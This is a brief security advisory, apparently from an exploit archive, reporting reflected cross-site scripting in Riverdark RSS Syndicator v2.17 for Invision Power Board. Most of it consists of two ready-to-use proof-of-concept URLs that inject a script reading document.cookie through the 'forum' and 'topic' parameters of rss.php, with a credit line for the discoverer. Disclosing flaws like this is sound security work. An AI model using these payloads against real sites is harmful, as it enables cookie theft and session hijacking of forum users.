Riverdark RSS Syndicator version 2.17 is susceptible to cross site scripting attacks.
6088a27b40b8d5a5418660901ae75e2e548a229ca66a4042b59480a19e67bc68
DESCRIPTION:Riverdark RSS Syndicator v2.17 .This is a pretty basic little RSS syndication tool for Invision Power Board 2.0.0, which outputs the last x number of posts in an RSS 2.0 feed
Vendor Page:http://www.riverdark.net/
VULNARBILITY:Cross Site Script
http://[host]/[board]/rss.php?forum=<script>alert(document.cookie);</script>
OR
http://[host]/[board]/rss.php?topic=<script>alert(document.cookie);</script>
Descovered By: X1NG
x1ngBox <at/> gmail com